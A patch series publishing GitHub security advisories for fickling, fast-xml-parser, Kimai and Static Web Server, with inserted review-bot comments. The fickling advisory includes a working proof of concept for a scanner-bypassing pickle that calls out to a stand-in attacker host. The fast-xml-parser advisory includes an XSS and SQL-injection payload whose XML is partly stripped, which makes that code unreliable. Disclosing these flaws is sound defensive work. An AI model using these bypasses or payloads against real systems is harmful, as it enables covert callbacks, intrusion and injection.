6ecbb5d81416845a005f1975cc1ad6996ffcc41f Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 20 Feb 2026 18:25:10 +0000
Subject: [PATCH 13/77] Publish Advisories GHSA-83pf-v6qq-pwmr GHSA-m7jm-9gc2-mpf2
---
 .../GHSA-83pf-v6qq-pwmr.json | 63 +++++++++++++++++
 .../GHSA-m7jm-9gc2-mpf2.json | 69 +++++++++++++++++++
 2 files changed, 132 insertions(+)
 create mode 100644 advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
 create mode 100644 advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
new file mode 100644
index 0000000000000..b624bac6e6e65
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-83pf-v6qq-pwmr/GHSA-83pf-v6qq-pwmr.json
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83pf-v6qq-pwmr", + "modified": "2026-02-20T18:24:46Z", + "published": "2026-02-20T18:24:46Z", + "aliases": [], + "summary": "Fickling has a detection bypass via stdlib network-protocol constructors", + "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` are added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. 
All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. 
`UnusedVariables` sees `_var0` as unused and raises `SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. 
Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] 
fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). 
All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fickling" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-83pf-v6qq-pwmr" + }, + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/pull/233" + }, + { + "type": "WEB", + "url": "https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade" + }, + { + "type": "PACKAGE", + "url": "https://github.com/trailofbits/fickling" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:24:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json new file mode 100644 index 0000000000000..00a2eb0601e16 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json 
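Review bot: The "Our assessment" paragraph that opens `details` lists `imtplib` first among the modules added to the unsafe imports, which looks like a typo for `smtplib`: the table and the rest of the report name `smtplib` / `SMTP`, and Python has no stdlib module called `imtplib`. Anyone copying that list into their own deny-list or detection rule would miss the SMTP case, so the first name should read `smtplib`. The same paragraph says the `UnusedVariables` heuristic works as expected while the quoted report calls root cause 2 unpatched, and `affected` carries `"last_affected": "0.1.7"` with no `fixed` event; one sentence saying which part of the report is accepted and which release will carry the blocklist change would let consumers decide whether to act.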
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7jm-9gc2-mpf2", + "modified": "2026-02-20T18:23:54Z", + "published": "2026-02-20T18:23:54Z", + "aliases": [ + "CVE-2026-25896" + ], + "summary": "fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names", + "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (`<`, `>`, `&`, `"`, `'`) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n regx: RegExp(`&${entityName};`, \"g\"),\n val: val\n};\n```\n\nAn entity named `l.` produces the regex `/&l.;/g` where `.` matches **any character**, including the `t` in `<`. 
Since DOCTYPE entities are replaced before built-in entities, this shadows `<` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`), and in the v6 codebase - `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^&*()<>|+\"; // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/&l.;/g` | `<` |\n| `g.` | `/&g.;/g` | `>` |\n| `am.` | `/&am.;/g` | `&` |\n| `quo.` | `/&quo.;/g` | `"` |\n| `apo.` | `/&apo.;/g` | `'` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `\n\">\n]>\n\n Hello <b>World</b>\n`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello b>World/b>\n```\n\nNo special parser options needed - `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page (e.g. `innerHTML`, template interpolation, SSR), the injected `` fires.\n\n`&` can be shadowed too:\n\n```js\nconst xml2 = `\n\n]>\nSELECT * FROM t WHERE name='O&Brien'`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. 
Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `<` / `>` / `&` / `"` / `'` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&');\nentities[entityName] = {\n regx: RegExp(`&${escaped};`, \"g\"),\n val: val\n};\n```\n\nFor v6, add `.` to the blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[].{}^&*()<>|+\";\n```\n\n## Severity\n\nEntity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "fast-xml-parser" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.3" + }, + { + "fixed": "5.3.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69" + }, + { + "type": "PACKAGE", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-185" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:23:54Z", + 
"nvd_published_at": null + } +} \ No newline at end of file From 5c53a256b8dced5ac1beb8f00ffe323e89a380fd Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 18:27:01 +0000 Subject: [PATCH 14/77] Publish Advisories GHSA-cv8h-r7r5-vwj9 GHSA-qhp6-635j-x7r2 --- .../GHSA-cv8h-r7r5-vwj9.json | 35 ++++++++--- .../GHSA-qhp6-635j-x7r2.json | 61 +++++++++++++++++++ 2 files changed, 89 insertions(+), 7 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json (65%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json diff --git a/advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json b/advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json similarity index 65% rename from advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json rename to advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json index 438810181f5a8..c61bf6e4afedb 100644 --- a/advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json +++ b/advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-cv8h-r7r5-vwj9", - "modified": "2025-12-19T21:30:20Z", + "modified": "2026-02-20T18:25:02Z", "published": "2025-12-19T21:30:20Z", "aliases": [ "CVE-2023-53957" ], + "summary": "Kimai contains a SameSite cookie vulnerability", "details": "Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.", "severity": [ { 
@@ -14,18 +15,38 @@
 },
 {
 "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "kimai/kimai"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.30.10"
+ }
+ ]
+ }
+ ]
 }
 ],
- "affected": [],
 "references": [
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53957"
 },
 {
- "type": "WEB",
- "url": "https://github.com/kimai/kimai/releases/tag/1.30.10"
+ "type": "PACKAGE",
+ "url": "https://github.com/kimai/kimai"
 },
 {
 "type": "WEB",
@@ -41,8 +62,8 @@
 "CWE-1275"
 ],
 "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T18:25:02Z",
 "nvd_published_at": "2025-12-19T21:15:52Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json
new file mode 100644
index 0000000000000..e0bc2d82f86bd
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qhp6-635j-x7r2",
+ "modified": "2026-02-20T18:25:27Z",
+ "published": "2026-02-20T18:25:27Z",
+ "aliases": [
+ "CVE-2026-27480"
+ ],
+ "summary": "Static Web Server affected by timing-based username enumeration in Basic Authentication due to early response on invalid usernames",
+ "details": "## Summary\n\nA Timing-based username enumeration in Basic Authentication vulnerability due to early response on invalid usernames could allow attackers to identify valid users and focus their efforts on targeted brute-force or credential-stuffing attacks.\n\n## Details\n\nSWS validates the provided username before performing any password verification.\n- **Invalid Username:** The server returns a `401 Unauthorized` response immediately.\n- **Valid Username:** The server proceeds to verify the password (e.g., using `bcrypt`), which introduces a different execution path and measurable timing discrepancy.\n\nThis allows an attacker to distinguish between existing and non-existing accounts by analyzing response times.\n\n## PoC\n\nThe following statistical results were obtained by measuring the mean response time over 100 iterations using a custom Rust script:\n\n| User Type | Average Response Time |\n| :--- | :--- |\n| **Invalid User** | 0.409861 ms |\n| **Valid User** | 0.250925 ms |\n| **Difference** | **~0.158936 ms** |\n\nWhile the valid user responded faster in this specific test environment, the statistically significant gap confirms that the authentication logic does not execute in constant time.\n\n## Impact\n\nUsers using the SWS' Basic Authentication feature are primarily impacted.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "static-web-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.1.0"
+ },
+ {
+ "fixed": "2.41.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/static-web-server/static-web-server/security/advisories/GHSA-qhp6-635j-x7r2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/static-web-server/static-web-server/commit/7bf0fd425eb10dac9bf9ef5febce12c4dd039ce1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/static-web-server/static-web-server"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-204"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T18:25:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 2112e7a0ac18e485eaba6eccdb40734e46363e43 Mon Sep 17 00:00:00 2001
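Review bot: `cwe_ids` in GHSA-qhp6-635j-x7r2.json lists only `"CWE-204"` (Observable Response Discrepancy), but what `details` describes is a difference in response time rather than in response content, which is the case CWE-208 (Observable Timing Discrepancy) covers. Anyone filtering advisories by CWE to find timing side channels in authentication code would miss this record, so I would add `"CWE-208"` alongside the existing entry. The `details` text is also internally inconsistent: the Details section says the invalid-username path returns immediately, while the PoC table reports the valid user as the faster case, so the prose should state which path was measured as slower instead of leaving the reader to reconcile the two.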
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 18:33:05 +0000 Subject: [PATCH 15/77] Advisory Database Sync --- .../GHSA-h2w9-p5qf-qmrh.json | 1 + .../GHSA-mj4r-rpwm-gg33.json | 10 +++- .../GHSA-7365-jmqc-qf8w.json | 3 +- .../GHSA-23vm-r6m3-8q9g.json | 31 ++++++++++ .../GHSA-256m-r39j-gmcw.json | 31 ++++++++++ .../GHSA-279c-6crv-5wxc.json | 31 ++++++++++ .../GHSA-27v4-jx99-gfh6.json | 11 +++- .../GHSA-28ww-g7m4-w94r.json | 31 ++++++++++ .../GHSA-29xg-2j5g-mj8g.json | 31 ++++++++++ .../GHSA-2c3x-rrq4-j7xg.json | 31 ++++++++++ .../GHSA-2cpq-4q56-fghm.json | 11 +++- .../GHSA-2cv8-fr2g-g66g.json | 31 ++++++++++ .../GHSA-2fcj-pq3f-v8fp.json | 11 +++- .../GHSA-2rf2-f6mm-2232.json | 31 ++++++++++ .../GHSA-2rfp-jrr8-m33f.json | 11 +++- .../GHSA-2v7m-mcj3-m7h7.json | 31 ++++++++++ .../GHSA-2wf2-988r-jv99.json | 31 ++++++++++ .../GHSA-2whc-3gm8-r8v3.json | 31 ++++++++++ .../GHSA-2x2g-fcpp-7fr9.json | 36 +++++++++++ .../GHSA-343f-9rcg-8p42.json | 31 ++++++++++ .../GHSA-37wf-f6wc-vqj8.json | 31 ++++++++++ .../GHSA-38fx-8cr9-9925.json | 31 ++++++++++ .../GHSA-38gw-g59j-rr5c.json | 36 +++++++++++ .../GHSA-3cmc-gqgq-xmxq.json | 11 +++- .../GHSA-3fr7-jch8-4qjv.json | 40 +++++++++++++ .../GHSA-3g7r-h8fj-xc5g.json | 31 ++++++++++ .../GHSA-3h5g-fffj-jhx9.json | 31 ++++++++++ .../GHSA-3mfv-m4f8-5m67.json | 31 ++++++++++ .../GHSA-3pw3-vpq3-qmc9.json | 31 ++++++++++ .../GHSA-3r56-xx7r-cr9c.json | 31 ++++++++++ .../GHSA-3rcg-gg9q-9688.json | 31 ++++++++++ .../GHSA-3rhf-g27v-qpj7.json | 31 ++++++++++ .../GHSA-3v2x-94p8-whg9.json | 11 +++- .../GHSA-3vr9-ghwq-fh8h.json | 40 +++++++++++++ .../GHSA-42h9-mr3g-6gc2.json | 29 +++++++++ .../GHSA-42qj-j5qx-4j25.json | 48 +++++++++++++++ .../GHSA-42vx-f9wx-wg3r.json | 36 +++++++++++ .../GHSA-43rm-rg7w-7rjf.json | 31 ++++++++++ .../GHSA-43ww-vg8r-97hv.json | 31 ++++++++++ .../GHSA-46ph-2qpx-729g.json | 31 ++++++++++ .../GHSA-47ph-88gx-hg42.json | 52 ++++++++++++++++ 
.../GHSA-48pc-4fq3-jhwg.json | 31 ++++++++++ .../GHSA-4cfj-pm5j-9qhf.json | 11 +++- .../GHSA-4f62-jjjx-4hrr.json | 31 ++++++++++ .../GHSA-4fcf-69p7-63vf.json | 60 +++++++++++++++++++ .../GHSA-4ff7-6hm2-x86r.json | 31 ++++++++++ .../GHSA-4fwr-9c58-jg7x.json | 31 ++++++++++ .../GHSA-4ggr-f4xw-9446.json | 31 ++++++++++ .../GHSA-4gvf-3g6g-c2mg.json | 31 ++++++++++ .../GHSA-4mjj-m5cc-rchc.json | 11 +++- .../GHSA-4pmf-68jr-9pq2.json | 31 ++++++++++ .../GHSA-4pmr-jmj5-4gwv.json | 31 ++++++++++ .../GHSA-4qvw-ghv2-2gg4.json | 31 ++++++++++ .../GHSA-4r8w-crc8-mqph.json | 31 ++++++++++ .../GHSA-4wc7-crf4-r645.json | 31 ++++++++++ .../GHSA-5284-5qqc-v2w8.json | 31 ++++++++++ .../GHSA-536p-mw62-6cm4.json | 31 ++++++++++ .../GHSA-53q4-966f-vpp2.json | 36 +++++++++++ .../GHSA-56wx-rr26-54fr.json | 31 ++++++++++ .../GHSA-57gh-h62q-5fwp.json | 31 ++++++++++ .../GHSA-57vf-72qj-2828.json | 31 ++++++++++ .../GHSA-58h5-w6gx-q297.json | 31 ++++++++++ .../GHSA-58p5-8f5p-8qqg.json | 31 ++++++++++ .../GHSA-58qh-jxh9-rvp5.json | 31 ++++++++++ .../GHSA-5h9r-fr4c-2vwr.json | 31 ++++++++++ .../GHSA-5j3p-mg5x-539j.json | 31 ++++++++++ .../GHSA-5ppr-f7g3-89cw.json | 31 ++++++++++ .../GHSA-5w67-c6pv-hmpq.json | 31 ++++++++++ .../GHSA-5xcj-44v8-p2v3.json | 56 +++++++++++++++++ .../GHSA-5xr7-h2jm-xhr2.json | 31 ++++++++++ .../GHSA-6262-6vhm-9x8v.json | 31 ++++++++++ .../GHSA-62hw-x3qq-c7vv.json | 40 +++++++++++++ .../GHSA-62jc-vj7m-2q9x.json | 31 ++++++++++ .../GHSA-62mp-mc96-vv2w.json | 31 ++++++++++ .../GHSA-63pr-8qvw-vfv9.json | 31 ++++++++++ .../GHSA-63v8-38hf-jrfm.json | 31 ++++++++++ .../GHSA-6562-26mh-56xr.json | 31 ++++++++++ .../GHSA-66q7-4wcm-7r85.json | 31 ++++++++++ .../GHSA-6c3h-gxfp-37vm.json | 11 +++- .../GHSA-6frj-85f5-897h.json | 31 ++++++++++ .../GHSA-6fwh-vwxr-5jrw.json | 31 ++++++++++ .../GHSA-6g49-x6hq-6rmq.json | 31 ++++++++++ .../GHSA-6qvx-865f-qrhf.json | 31 ++++++++++ .../GHSA-6rr6-99p5-684x.json | 31 ++++++++++ .../GHSA-6v87-78cw-pw29.json | 31 ++++++++++ 
